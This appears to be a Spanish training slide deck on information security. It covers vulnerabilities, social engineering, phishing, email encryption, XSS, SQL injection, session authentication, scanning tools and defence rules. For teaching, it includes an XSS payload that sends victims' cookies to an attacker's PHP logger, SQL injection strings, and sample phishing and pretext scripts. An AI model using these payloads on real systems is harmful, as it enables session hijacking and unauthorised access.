  • 2. Seguridad de la información 1. En vuestra empresa, vida diaria, que problemas de seguridad apreciáis 2. Estáis preparados ante vulnerabilidades físicas 3. Cada cuanto tiempo hacéis copias de seguridad y dónde las guardáis 4. Creéis que sois vulnerables a la ingeniería social 5. Empleáis el email para enviar información confidencial 6. En donde creéis que debemos invertir más en seguridad Infraestructuras – hardware – software – personal 7. De 0 a 10, que importancia le dais a la información que manejáis en la empresa 8. De 0 a 10, como consideráis de seguras vuestras contraseñas 9. Se puede hacer un sistema 100% seguro
  • 3. Seguridad de la información p Protección de la información y de los sistemas de información contra n Acceso indebido n Uso, negligente o no n Divulgación n Interrupción n Destrucción no autorizada
  • 4. Seguridad de la información p Conceptos básicos n Confidencialidad p La información solo debe ser legible para personal autorizado p Evita que exista una intercepción de esta y que pueda ser leída por una persona no autorizada
  • 5. Seguridad de la información p Conceptos básicos n Disponibilidad p Garantiza el acceso n Irrefutabilidad p No se puede negar la autoría n Autenticación p Solo individuos autorizados tienen acceso a los recursos
  • 6. Seguridad de la información p Conceptos básicos n Integridad p Garantizar que los datos sean los que se suponen que son y no se hayan alterados in situ o durante una transmisión
  • 7. Seguridad de la información Existe la seguridad absoluta???
  • 8. Seguridad de la información p Todo es vulnerable si se aplica aplica la fuerza justa p Laúnica razón por la cual utilizamos rejas en nuestras casas es porque hace que el ataque sea más lento
  • 9. Seguridad de la información p El coste de la seguridad aumenta exponencialmente a la necesidad de minimizar el riesgo p Un hacker puede gastar una ínfima parte en intentar vulnerar un sistema de lo que cuesta evitar el ataque p Las empresas asumen riesgos a fin de minimizar costes
  • 10. Seguridad de la información p Objetivo: p Obtener un factor coste/riesgo asumible p Una máxima: p El sistema de seguridad no puede ser más valioso que el sistema o los datos que protege p Existen documentos, directrices y recomendaciones para establecer políticas de seguridad adecuadas
  • 11. Seguridad de la información VULNERABILIDAD
  • 12. Seguridad de la información p Vulnerabilidad n Es la posibilidad de que una amenaza se materialice sobre un activo n Las amenazas pueden desencadenar incidentes en: p La organización p Los procedimientos p Equipos p Software p Información
  • 13. Seguridad de la información p Analogía con el mundo real: p En el mundo informático el funcionamiento es muy similar p Existe un agujero de seguridad y mientras éste permanezca abierto estaremos predispuestos a sufrir un ataque.
  • 14. Seguridad de la información p Ciclo de vida de una vulnerabilidad: n Supongamos que se ha descubierto una vulnerabilidad n Es de dominio público y aún no hay disponible ni solución ni parche
  • 15. Seguridad de la información p Ciclo de vida de una vulnerabilidad: 1. Creación: p no intencionada en la creación o actualización de un producto p error en el desarrollo o descuido en la configuración. 2. Descubrimiento y publicación: p Webs que ofrecen información diaria sobre las últimas vulnerabilidades y cuentan con extensas BD: p National Vulnerability Database (EN) § http://nvd.nist.gov/ p SecurityFocus (EN) § http://www.securityfocus.com/vulnerabilities p Secunia (EN) § http://secunia.com/advisories/historic/
  • 16. Seguridad de la información p Ciclo de vida de una vulnerabilidad: 3. Explotación de la vulnerabilidad: p se intenta desarrollar programas que automaticen el proceso. 4. Desarrollo de solución o parche: p se desarrolla una solución efectiva y permanente al agujero de seguridad. Entre las distintas posibilidades: p Publicación por parte del fabricante de un parche o actualización del producto p Métodos de prevención temporales o no oficiales como la publicación de un parche independiente del fabricante, el cierre de puertos, la desactivación de servicios, etc.
  • 17. Seguridad de la información p Ciclo de vida de una vulnerabilidad: 5. Difusión de la actualización: p Finaliza la existencia del defecto de seguridad p Masivamente a través de mecanismos de actualización automática así como de una integración total con el producto afectado Nueva “actualización” posible nueva vulnerabilidad?
  • 18. Seguridad de la información p Qué tipos de vulnerabilidades existen Los ataques se pueden producir en cada eslabón de esta cadena, siempre y cuando exista una vulnerabilidad que pueda aprovecharse
  • 19. Seguridad de la información p Tipos de vulnerabilidades n Vulnerabilidad Física: el atacante tiene posibilidad de entrada o acceso físico a las instalaciones e incluso a los equipos: p Interrupción del suministro eléctrico. p Apagado manual del equipo. p Vandalismo. p Apertura de la carcasa del equipo y robo del disco duro. p Monitorización del tráfico de red. n Vulnerabilidad Natural: se refiere al grado en que el sistema puede verse afectado por desastres naturales o ambientales que pueden dañar el sistema: p Fuego Rayos Terremotos p Inundaciones Fallos eléctricos Picos de tensión
  • 20. Seguridad de la información p Tipos de vulnerabilidades n Vulnerabilidad del Hardware y del Software: ciertos tipos de dispositivos requieren la posesión de algún tipo de herramienta o tarjeta para poder acceder a los mismos p Bugs de los sistemas operativos p Bugs en software en general n Vulnerabilidad por emanación: los dispositivos eléctricos y electrónicos emiten radiaciones electromagnéticas
  • 21. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n De configuración: es una vulnerabilidad no del diseño del mismo sino del usuario. p Se considera error cuando la configuración por defecto es insegura p Ej.: aplicación recién instalada con usuario por defecto n Gestión de credenciales: tiene que ver con la gestión de usuarios, contraseñas y los ficheros que los almacenan n Permisos, privilegios y/o control de acceso: ocurre cuando el acceso o asignación de permisos es defectuoso p Se trata del sistema y no del administrador
  • 22. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Validación de entrada p se produce cuando la entrada que procesa un sistema no es comprobada adecuadamente n Salto de directorio p es la falta de seguridad de un servicio de red para desplazarse por el árbol de directorios hasta la raíz del sistema. Podrá desplazarse para ejecutar una utilidad de forma remota n Seguimiento de enlaces p cuando no existe una protección bastante robusta para evitar el acceso a un directorio desde un enlace simbólico o acceso directo n Por puertas trampa/traseras p son entradas ocultas en un programa de software que permite el acceso
  • 23. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Por intrusiones: existen diversos tipos: p Análisis de puertos p Elevación de privilegios: consiste en enviar una solicitud específica. En ciertos casos, esto genera comportamientos atípicos. § desbordamiento de búfer: se desborda cuando de forma incontrolada intenta meter más datos de los que caben. Son defectos de programación y existen lenguajes que lo evitan § agotamiento del búfer: cuando un búfer usado para comunicarse entre 2 dispositivos se alimenta con datos a una velocidad mas baja de la que lee p Ataques malintencionados (virus, gusanos, troyanos).
  • 24. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Secuencia de comandos en sitios cruzados (XSS): abarca cualquier ataque que permite ejecutar código de scripting (Ej.: javascript) en el contexto de otro dominio. p Aplicaciones HTML p Navegadores El problema radica en incorrecta validación de los datos de entrada: hay 2 tipos: p Indirecta: modifica valores que la aplicación web utiliza para pasar variables entre paginas, sin sesiones (URL) p Directa: localiza puntos débiles en la programación de filtros (Formularios)
  • 25. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n SQL Injection: está en el nivel de BD de una aplicación. p Consiste en insertar un trozo de código SQL dentro de otro con el fin de modificar su comportamiento. p Se realiza una consulta con parámetros dados por el usuario y dentro de esos datos estaría el código malicioso n Por denegación de servicio: interrumpir el funcionamiento normal de un servicio. p Las denegaciones de servicio se dividen: § Explotación de las debilidades del protocolo TCP/IP. § Explotación de las vulnerabilidades del software del servidor.
  • 26. Seguridad de la información p Centrándonos en vulnerabilidades de Software: n Inyección de código: Existen distintos subtipos: p Inyección directa de código estático § Código en el contenido de las páginas § Permanente § Solución usar listas negras y listas blancas p Evaluación directa de código dinámico § Código en contenido dinámico § No permanente § Necesidad de crear funciones § Solución usar listas negras y listas blancas p Inclusión remota de archivos PHP § Uso de la función include() o require() que permite enlazar archivos en otros servidores § Si en el include/require incorporamos variables o funciones que puedan ser alteradas
  • 27. Seguridad de la información INGENIERÍA SOCIAL
  • 28. Seguridad de la información p La mayor parte de los ataques exitosos son total o parcialmente debidos a Ingeniería Social p Kevin Mitnick “Condor” es considerado el primer hacker que la usó. (Doc: Freedom downtown) n “El factor determinante es interpretar correctamente las políticas de seguridad y hacerlas cumplir” n Los ataques de ingeniería social (teléfono o email), son basados en cuatro principios básicos y comunes a las personas: p Todos queremos ayudar p Somos confiados p No nos gusta decir No p A todos nos gusta que nos alaben
  • 29. Seguridad de la información p Ingeniería social n Consiste en la manipulación de las personas para que voluntariamente realicen actos que normalmente no harían n Se convierte en el método de ataque más sencillo, menos peligroso para el atacante y por desgracia en uno de los más efectivos n Aprovecha el desconocimiento de unas mínimas medidas de seguridad
  • 30. Seguridad de la información p Ingeniería social Ah, también gestiono una red. Nunca pude ¿Cómo configura pensar en sus firewalls? una buena contraseña. ¿Qué utiliza usted?
  • 31. Seguridad de la información p Ingeniería social - Phishing Phisher se Phisher utiliza la prepara para información para atacar suplantar a víctima Phisher envía mail fraudulento a victimas Información Víctima sigue confidencial es indicaciones de enviada al Phisher phisher Víctima compromete información confidencial
  • 32. Seguridad de la información p Ejemplos Ingeniería social n correo electrónico: From: Super-User <root@sistema.com> To: Usuario <user@sistema.com> Subject: Cambio de clave Hola, Para realizar una serie de pruebas orientadas a conseguir un optimo funcionamiento de nuestro sistema, es necesario que cambie su clave mediante la orden 'passwd'. Hasta que reciba un nuevo aviso (aproximadamente en una semana), por favor, asigne a su contraseña el valor 'PEPITO' (en mayúsculas). Rogamos disculpe las molestias. Saludos, Administrador
  • 33. Seguridad de la información p Ejemplos Ingeniería social n Llamada telefónica (el atacante sabe el nombre de cuenta): Administrador: Buenos días, aquí área de sistemas, en qué podemos ayudarle? Atacante: Hola, soy José Luis Pérez, llamaba porque no consigo recordar mi password en la máquina sistema.xx.es. Administrador: Un momento, me puede decir su nombre de usuario? Atacante: Sí, claro, es jlperez. Administrador: Muy bien, la nueva contraseña que acabo de asignarle es *****. Por favor, nada más conectar, no olvide cambiarla. Atacante: Por supuesto. Muchas gracias, ha sido muy amable. Administrador: De nada, un saludo.
  • 34. Seguridad de la información p Ejemplos Ingeniería social n http://www.youtube.com/watch?v=Ao20tAS3x3I n http://www.youtube.com/watch?v=wiRuBZxMLss&feature=re lated (3 videos) n http://www.youtube.com/watch?v=NgHYI4AUUPc n http://www.youtube.com/watch?v=cm89EQCF5e8&feature=re lated
  • 35. Seguridad de la información PHISHING
  • 36. Seguridad de la información p Como funciona 1. Correo electrónico masivo 2. Correo electrónico phishing 3. Sitio Web fraudulento p Afecta principalmente n instituciones financieras n proveedores internet n grandes tiendas
  • 37. Seguridad de la información p Correo n Remitente: Banco Bilbao Vizcaya Argentaria info@bbva.es n Asunto: Aviso Importante n Logotipo oficial n Aviso de Phishing n Derechos reservados n Teléfono de contacto
  • 38. Seguridad de la información Reconocerías una web falsa?
  • 39. Seguridad de la información
  • 40. Seguridad de la información
  • 41. Seguridad de la información
  • 42. Seguridad de la información
  • 43. Seguridad de la información p Correo donde el INE hace un sondeo sobre satisfacción con los bancos 1. Damos la información 2. Nos redirige a la web oficial
  • 44. Seguridad de la información p 40% error incluso entre usuarios “tecnológicamente avanzados” www.bankofthevvest.com www.hatmail.com http://www.faccebook.es/
  • 45. Seguridad de la información p http://www.phishtank.com/ n Facebook: http://faccebook.c.la/ n PayPal: http://www.phishtank.com/phish_detail.php?phish_id=916961 n Bank of America: http://www.phishtank.com/phish_detail.php?phish_id=916955 n Hotmail: http://www.phishtank.com/phish_detail.php?phish_id=916948
  • 46. Seguridad de la información p Otros tipos de phishing n Vía programa malicioso. p Troyano que instala programa espía (en juegos y aplicaciones free) n A través de ataque al navegador con vulnerabilidades p Permite generar interfaces superpuestas sobre webs oficiales p Muy difícil de detectar n Scam: ofertas de trabajo para blanquear dinero n Nuevas variantes: p Vishing: con tecnología VoIp (Identificador de llamada falsificable) p Smishing: usan SMS p Spear phishing: el correo va al jefe (CEO) § Correo personalizado § No usan correo masivo
  • 47. Seguridad de la información p Tendencias n A la profesionalización p Ataques sofisticados y difíciles de detectar p Difícil identificar interfaces falsas p Simulación de URL p Ataques sobre DNS n Siguen funcionando los ataque simples e ingeniería social de nivel bajo n Cada vez más las pequeñas empresas afectadas
  • 48. Seguridad de la información p Prevención n Su usuario, contraseña, pin, firma, etc. son datos de carácter personal y estrictamente confidenciales n Desconfíe de cualquier toma de datos personales realizada a través de Internet fuera de su sitio web seguro. n No dé nunca información personal o financiera en respuesta a un e-mail n No utilice los enlaces incorporados en e-mails o páginas Web de terceros n Cuidado con los adjuntos (exe, doc, xls…) n Educación y mucha cultura de seguridad
  • 49. Seguridad de la información COMO PROTEGERNOS
  • 50. Seguridad de la información p ¿Cómo nos protegemos de la forma más eficiente posible? 1. Determinando que queremos proteger (ej: Hardware, datos, comunicaciones, sistemas, etc.) 2. Estableciendo prioridades de los factores a proteger 3. Creando políticas de seguridad 4. Manteniendo la seguridad en el tiempo
  • 51. Seguridad de la información p Debemos enfocarnos en n reducir el riesgo, no en tratar de eliminar las amenazas, ya que es imposible. p Para eso debemos saber n de qué o quiénes nos protegemos n cómo nos atacan.
  • 52. Seguridad de la información p Pocos ataques tienen éxito sin una preparación previa: Infiltrado de programas, recopilación de información sobre usuarios, claves, etc. p Un sistema de seguridad es tan fuerte como su eslabón más débil p Para poder defender nuestros sistemas, es necesario conocer la forma en que los atacantes actúan y cuáles son sus armas “El único sistema que está seguro es el que se encuentra debidamente apagado y dentro de una caja ignifuga” (Gene Spafford)
  • 53. Seguridad de la información Ataques organizativos Hackers Ataques Datos restringidos automatizados DoS Infracciones accidentales Errores de conexión de la seguridad Denegación de Virus, servicio (DoS) caballos de Troya y gusanos
  • 54. Seguridad de la información p Estrategias de seguridad n Proactivas (proteger y proceder) p Se basan en la prevención de ataques p Reducir al mínimo la cantidad de puntos vulnerables p Desarrollar planes de contingencia n Reactivas (perseguir y procesar) p Posterior al ataque p Evaluar ataque, reparar e implementar plan de contingencia, documentar y aprender
  • 55. Seguridad de la información p Estrategias de seguridad Con respecto a la postura en recursos compartidos n Lo que no se permite está expresamente prohibido p El sistema está perfectamente delimitado n Lo que no se prohíbe está permitido p Menos restrictiva y favorecida por la imposibilidad de políticas de restricción a medida para todos los posibles casos
  • 56. Seguridad de la información p Estrategias de seguridad Datos Encriptación Seguridad de programas y Aplicación servicios Fortalecer el sistema operativo, Host autenticación Marketing, Ventas, Finanzas, Red interna encriptar datos de red Oficina principal, oficina sucursal, Perímetro socio de negocios. Firewall Seguridad física Protecciones, seguros, dispositivos de seguimiento Políticas, procedimientos y Documentos de seguridad, conciencia educación del usuario
  • 57. Seguridad de la información p Debemos formar al usuario: Cultura de seguridad Formatos potencialmente peligrosos No abrir archivos no solicitados No utilizar fuentes no confiables Navegación segura Política de passwords Copias de seguridad
  • 58. Seguridad de la información FIRMA Y CIFRADO DE CORREO
  • 59. Seguridad de la información p Cifrar: Alterar el contenido para que sólo los destinatarios puedan entenderlo p Firmar: permite al destinatario comprobar que el mensaje no fue modificado en el camino y que lo que lee es exactamente lo que se envió p Como lo hacemos p Clave pública: § La conocen sólo los destinatarios § Permite a la gente verificar nuestra firma y crear mensajes cifrados para nosotros. § Para enviar correos cifrados p Clave privada: § Sólo la conoce el emisor § Permite firmar y descifrar correo § Para enviar correos firmados p no se puede averiguar una a través de la otra.
  • 60. Seguridad de la información p Ejemplo de firma
  • 61. Seguridad de la información p Ejemplo de cifrado
  • 62. Seguridad de la información p Cifrado con PGP (GNU Privacy Guard) n Aplicación de cifrado asimétrico libre n http://www.gnupg.org/ n ftp://ftp.gnupg.org/gcrypt/binary/ (windows) n http://macgpg.sourceforge.net/(mac) p Instalamos PGP p Necesitamos un cliente de correo n Thunderbird n http://es-es.www.mozillamessaging.com/es- ES/thunderbird/ p Necesitamos un software de cifrado y autenticación n Enigmail 1.0.1 n https://addons.mozilla.org/es-ES/thunderbird/addon/71 n Instalamos: ThunderbirdàHerramientasàComplementos n Genera nueva opción de menú OpenPGP
  • 63. Seguridad de la información p Generar las claves n OpenPGP à Administración de claves n En el administrador de claves p Generar à Nuevo par de claves p Generar certificado de revocación p Configuración de las claves n En la configuración de la cuenta : activar soporte OpenPGP p Subir claves públicas a n http://www.rediris.es/cert/servicios/keyserver/
  • 64. Seguridad de la información p Encriptar con GMAIL n Configurar el navegador “Conexión del navegador” para usar siempre https n Instalamos PGP n Usaremos Mozilla Firefox n Instalamos el complemento para Firefox p FireGPG p http://es.getfiregpg.org/s/install p Incompatible con FireFTP p Reiniciar si es necesario n Acceder a Gmail y firmar y cifrar a través de iconos
  • 65. Seguridad de la información AMENAZAS EN LA RED
  • 66. Seguridad de la información p Existen 4 tipos de amenazas en la red: n Interrupción: Hace que el objetivo del ataque se pierda, quede inutilizable o no disponible n Interceptación: Consiste en acceder a un determinado objeto del sistema n Modificación: Además de la interceptación, el objeto del ataque es modificado n Fabricación: Modificación destinada a suplantar el objeto real
  • 67. Seguridad de la información
  • 68. Seguridad de la información p Ataques Internos n Premeditación n Descuido n Ignorancia n Indiferencia de las políticas de seguridad p Ataques externos n Hackers, Crackers, Lammers, Script-Kiddies n Motivaciones: p Ranking, reto personal p Robo de datos p Pruebas (pen test), etc.
  • 69. Seguridad de la información p Origen de las amenazas n Personas: Piratas que buscan nivel de privilegios en un sistema. Además de conocimientos técnicos, usan tácticas como la Ingeniería Social y el Basureo. n Personal de la organización: Cualquier empleado puede ser una amenaza. Pueden causar daños no intencionados, pero cuando lo hacen de forma intencionada son extremadamente dañinos n Ex-empleados: Pueden tener motivos para Atacar n Curiosos: Aunque se trata de ataques no destructivos, el borrado de huellas puede causar daños
  • 70. Seguridad de la información
  • 71. Seguridad de la información p Hackers (expertos) n De sombrero blanco p Ayudan a mejorar los sistemas y tecnologías informáticas p Responsables de los protocolos informáticos y herramientas p Optimizan sistemas, prueban las tecnologías y aprenden con el objetivo de hacerlas mas eficientes y fiables n De sombrero negro (piratas) p Propósito siempre malicioso
  • 72. Seguridad de la información p De sombrero negro (piratas) n Script Kiddies (crashers, lamers, packet monkeys) p Jóvenes usuarios que usan programas encontrados en la red par dañar sistemas p Sin conocimientos y altamente incompetentes p Lamer. Se utiliza con tono despectivo para describir a un hacker que no sigue las reglas de la comunidad, o que intenta pavonearse de sus hazañas y conocimientos. n Phreakers p Usan la red telefónica para hacer llamadas gratis
  • 73. Seguridad de la información p De sombrero negro (piratas) n Caders: atacan sistemas de tarjetas (generalmente bancarias) para entender su funcionamiento y aprovechar sus vulnerabilidades n Crackers: crean software para atacar sistemas informáticos o eliminar la protección anticopia del software con licencia n Hacktivistas: Hackers con motivaciones ideologías
  • 74. Seguridad de la información EN LA WEB
  • 75. Seguridad de la información p Servidores y platatormas web n Ataques internos p Suplantación de identidad p Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR) p Robo de información. (Ej: para la competencia) p Virus, Troyanos, Gusanos p Espionaje: Trashing, Shoulder Surfing, Spyware, etc p Keylogging - Keycatching p KeyCatcher
  • 76. Seguridad de la información p Trashing (basureo) n Alfombrilla ratónà
  • 77. Seguridad de la información p Servidores y platatormas web n Ataques externos p Ataques contra servicios WEB § Cross Site Scripting (XSS) § SQL Injection § Exploits: aprovecha una vulnerabilidad de SO, Sw y Hw p Robo de Identidad p Denegación de Servicio (DoS) p SPAM p VIRUS p Phishing: ingeniería social, url mal escritas, webs simuladas p Troyanos: software malicioso bajo una apariencia inofensiva
  • 78. Seguridad de la información CROSS SITE SCRIPTING XSS
  • 79. Seguridad de la información p Servidores y platatormas web n Cross Site Scripting (XSS) p Aprovecha la falta de mecanismos de filtrado en los campos de entrada p Permiten insertar y enviar datos sin validación alguna, aceptando el envió de scripts completos p Pueden generar secuencias de comandos maliciosas que impacten directamente en el sitio o en el equipo de un usuario p Sentencias ocultas en el código: en enlaces, formularios… p Se usa el correo electrónico para enviarlos p Se usan blogs, foros, libros de visitas…
  • 80. Seguridad de la información p Ejemplos Cross Site Scripting (XSS) Supongamos que un sitio web tiene la siguiente forma: http://www.example.com/home.asp?frame=menu.asp En este ejemplo, ¿qué pasaría si se pone como URL del frame un código javascript? javascript:while(1)alert("Este mensaje saldrá indefinidamente");
  • 81. Seguridad de la información p Ejemplos Cross Site Scripting (XSS) Un atacante aprovecha la vulnerabilidad de nuestro sitio y publica una imagen de la siguiente manera: http://www.mipagina.com/mifoto.jpg name="foto“ onload="foto.src='http://www.mipagina.com/foto.php? galleta='%20+document.cookie;"> Código de foto.php. <? $migalleta = $_REQUEST[galleta]; $file=fopen("cookies.txt", "a"); fput($file, "$migalletan"); fclose($file); ?> La variable que contiene las cookies galleta del usuario será almacenada en un documento de texto llamado cookies.txt alojado en el servidor del atacante
  • 82. Seguridad de la información p Defensa Cross Site Scripting (XSS) n Url p Evitar llamadas a servidores externos p Evitar parámetros susceptibles (sql, datos privados…) n En formularios: p Limitar la longitud de los campos de entrada MaxLength p Validar los campos (expresiones regulares) n Cookies p Evitar almacenar datos susceptibles § Nombre usuario y contraseña § Tarjetas, cuentas bancarias … p Encriptar todas las cookies de nuestro sitio n Usar SSL (Secure Socket Layer) p No es 100% seguro contra XSS pero ayuda
  • 83. Seguridad de la información SQL INJECTION
  • 84. Seguridad de la información p SQL Injection n Filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. <% usuario=request.form("usuario") pass=request.form("pass") sql="SELECT * FROM usuarios WHERE user='" & usuario & "' and password='" & pass & "'“ %> p El usuario teclea en el formulario usuario:" a' or true ‘" contraseña: " a' or true ‘“ n La cadena resultado sería SELECT * FROM users WHERE user='a' or true and pass='a' or true n Otro ejemplo SELECT * FROM users WHERE user = ‘root' AND password='' OR ''='‘ --
  • 85. Seguridad de la información p SQL Injection n Mas peligroso p Se pueden concatenar sentencias de modificación, insertado y borrado de datos o de tablas n Solución: p No usar usuario root para acceso a las BBDD p Validar el contenido y longitud de los campos p Usar procedimientos almacenados p Evitar es que, al formar la cadena SQL, ésta tenga un "sentido" distinto al esperado = Eliminar comillas $query_result = mysql_query("SELECT * FROM usuarios WHERE nombre = "" . mysql_real_escape_string($nombre_usuario) . """);
  • 86. Seguridad de la información AUTENTIFICACIÓN
  • 87. Seguridad de la información p Autentificación de usuarios en la web n Se emplean sesiones p Son variables globales que nos permiten almacenar datos que necesiten volver a ser usados en otros accesos a la pagina n Pasos p Se crea el formulario de validación (login.php) p Se comprueba la validez del usuario (autenticacion.php) p Se crea la sesión y se da acceso al usuario o se deniega el mismo
  • 88. Seguridad de la información
  • 89. Seguridad de la información p Sesiones (autenticacion.php) <?php //vemos si el usuario y contraseña son válidos if ($_POST["usuario"]=="usuario" && $_POST["contrasena"]=="123"){ //usuario y contraseña válidos session_start(); $_SESSION["autenticado"]= "SI"; // seguridad almacenando sesion_id() $_SESSION[“id_misesion"]= session_id(); header ("Location: aplicacion.php"); }else { //si no existe se va a login.php header("Location: login.php?errorusuario=si"); } ?>
  • 90. Seguridad de la información p Sesiones (seguridad.php) <?php //Inicio la sesión session_start(); //COMPRUEBA QUE EL USUARIO ESTA AUTENTICADO if ($_SESSION["autenticado"] != "SI") { //si no existe, va a la página de autenticacion header("Location: login.php"); //salimos de este script exit(); } ?> n Este código lo incluimos en todas las páginas que requieran validación
  • 91. Seguridad de la información HERRAMIENTAS
  • 92. Seguridad de la información p GFI LANguard : n Escanea redes e informa de: p El nivel de service pack de cada máquina, falta de parches de seguridad, recursos compartidos, puertos abiertos, servicios/ aplicaciones activas en el equipo, datos del registro, passwords débiles, usuarios y grupos, puntos de acceso wireless, dispositivos USB ... p Escanea los resultados y los guarda en documentos HTML, sobre los que se puede consultar la información p Existe una versión gratuita que está disponible para su prueba y uso no comercial durante 30 días http://www.gfi.com/lannetscan
  • 93. Seguridad de la información p eEye retina: n Su función es explorar todas las maquinas de una red e informar sobre cualquier vulnerabilidad encontrada n Esta muy distribuida en el mercado, es sencilla y rápida para el escaneo de vulnerabilidades http://www.eeye.com/Products/Retina.aspx
  • 94. Seguridad de la información p Nikto: n Nikto es un escáner de servidores Web n Open source (GPL) n Busca más de 2000 archivos/CGIs potencialmente peligrosos y problemas en más de 200 servidores. n Tiene la capacidad de no sólo probar vulnerabilidades de CGI sino también que lo hace de forma evasiva, evitando los sistemas de detección de intrusos. n Viene con una documentación muy completa, la cual es recomendable revisar antes de ejecutar el programa. n Es una buena herramienta pero limitada por su uso de Whisker/ libwhisker, debido a la falta de actualizaciones de esta última, por lo que las vulnerabilidades más críticas no son detectadas http://www.cirt.net/nikto2 http://www.madirish.net/?article=216 (cómo instalar en windows)
  • 95. Seguridad de la información p WebScarab n Herramienta que permite analizar aplicaciones que se comunican usando protocolos de comunicación Web como el HTTP y el HTTPS n Almacena los resultados de sus escaneos n Diseñada para permitir a un desarrollador de aplicaciones basadas en HTTP(S) a depurar los errores de implementación y permitir identificar vulnerabilidades en el sistema http://sourceforge.net/projects/owasp/files/WebScarab/
  • 96. Seguridad de la información p Asociación de internautas n Scanner on-line n Realiza un escaneo en remoto de los ‘puertos bien conocidos’ del sistema objeto del estudio n Permite seleccionar los puertos que quieres analizar (hasta un máximo de 5 puertos) n Devuelve como resultado únicamente el estado (abierto, cerrado) en el que se encuentran los puertos seleccionados previamente http://www.internautas.org/w-scanonline.php
  • 97. Seguridad de la información p Dr. Web n Ofrece una herramienta On-line para el análisis en línea de direcciones de Internet en busca de código malicioso que pudiera estar inyectado en las páginas HTML. n En el caso de ser así, nos avisará que el acceso a este sitio podría ser peligroso, ya que podría dañar la configuración del sistema, por lo que sería aconsejable no acceder a dicha URL. http://online.us.drweb.com/?url=1
  • 98. Seguridad de la información p LinkScanner n Analiza URLs en línea o bajo demanda o si prefiere instalarla como herramienta de escritorio n Realiza un análisis de los resultados de búsquedas Web con motores de Google, MSN y Yahoo, para determinar si las páginas mostradas en la búsqueda realizada contienen virus, software espía, explotan alguna vulnerabilidad o se utilizan con otros fines fraudulentos. http://linkscanner.explabs.com/linkscanner/default.aspx
  • 99. Seguridad de la información p Virus Total n Servicio de análisis de archivos sospechosos que permite detectar virus, gusanos, troyanos, y malware en general n Trabaja con los principales motores de antivirus y antimalware: Avast!, Avira, Quick Heal, Clamwin, NOD 32, AVG, Antivir, Ikarus, Panda Platinum, BitDefender, Norton Antivirus n http://www.virustotal.com/
  • 100. Seguridad de la información p Nessus n Es la herramienta de evaluación de vulnerabilidades para UNIX de mayor renombre n Nessus quizás sea el mejor escáner de vulnerabilidades "Open Source" (GPL) que hay disponible en la red n Se actualiza constantemente, con más de 11.000 plugins gratuitos n Nessus 3 ahora es de código cerrado, aunque de coste gratuito a menos que desees los plugins más recientes http://www.nessus.org
  • 101. Seguridad de la información p Nessus n Basado en un modelo cliente/servidor que cuenta con su propio protocolo de comunicación n El servidor explora y prueba ataques contra objetivos establecidos n El cliente realiza las tareas de control, generación de informes y presentación de datos n Consta de 4 ficheros básicos: p Las librerías del programa p Las librerías NASL (Nessus Attack Scripting Language) p El núcleo de la aplicación p Los plugins (gestionan los diferentes tipos de ataques)
  • 102. Seguridad de la información p Nessus
  • 103. Seguridad de la información n Las 75 Herramientas de Seguridad Más Usadas p http://insecure.org/tools/tools-es.html n packet sniffers para Ethernet/LAN : p Wireshark (anteriormente conocido como Ethereal ), p Ettercap, TCPDump, WinDump, WinSniffer, Hunt, Darkstat, traffic-vis, KSniffer) p Redes inalámbricas: Kismet, Network Stumbler , ApSniffer
  • 104. Seguridad de la información NORMAS A SEGUIR
  • 105. Seguridad de la información p Normas de defensa n Respetar las políticas de seguridad n Antivirus + Firewall n Siempre tener nuestros servicios, sistemas operativos y aplicaciones actualizadas a la última versión conocida estable n Utilizar mecanismos de criptografía para almacenar y transmitir datos sensibles n Cambiar las claves cada cierto tiempo
  • 106. Seguridad de la información p Normas de defensa n Asignar un responsable de seguridad n Auto-auditar nuestros propios servicios n Autoatacarnos para saber si somos o no vulnerables n Estar siempre alerta. Es muy común: ”a nosotros nadie nos ataca”. n No dejar información sensible en directorios web n No usar las mismas claves para servicios distintos p Muy común: la clave de root sea la misma que la de MySQL y la misma que Apache ...
  • 107. Seguridad de la información p Normas de defensa n Cambiar los puertos por defecto en servicios no públicos n Aplicar técnicas de Hardening n Para servicios privados y confidenciales utilizar túneles seguros (VPN cifradas) en Internet y redes no seguras n Habilitar módulos de seguridad (Ej mod_security en Apache)
  • 108. Seguridad de la información p Normas de defensa n Nunca trabajar con ”root” si no es estrictamente necesario n Cerrar puertos y eliminar aplicaciones innecesarias n Proteger las URL (ej: mod_rewrite, o AJAX)
  • 109. Seguridad de la información p Normas de defensa n Elegir contraseñas seguras, mezclando mayúsculas, minúsculas, números y caracteres especiales. n Las claves no deben ser palabras coherentes ni de diccionario n 10 contraseñas mas usadas en la red de 32 millones p 123456-12345-123456789-password-iloveyou-princess- rockyou-1234567-12345678-abc123
  • 110. Seguridad de la información
  • 111. Seguridad de la información p Normas de defensa n Datos: p 16% usa su primer nombre como contraseña. p 14% usa combinaciones excesivamente fáciles de recordar como 1234, 123456, QWERTY p 5% eran nombres de celebridades tipo hanna, matrix o ironman. p 4% corresponden a palabras como password o password1. p 3% llegan a los límites del WTFismo con simples si, no, whatever. n Contraseña segura simple: s+6o1e$7 n Herramientas: p http://keepass.info/: almacena p http://passworg.badhim.com/: genera y valida
  • 112. Seguridad de la información “Seguridad no es un producto, es un proceso.” Bruce Schneier
  • 113. Seguridad de la información http://www.rompecadenas.com.ar/ http://foro.portalhacker.net/ http://www.elhacker.org http://www.kriptopolis.org/
  • 114. Seguridad de la información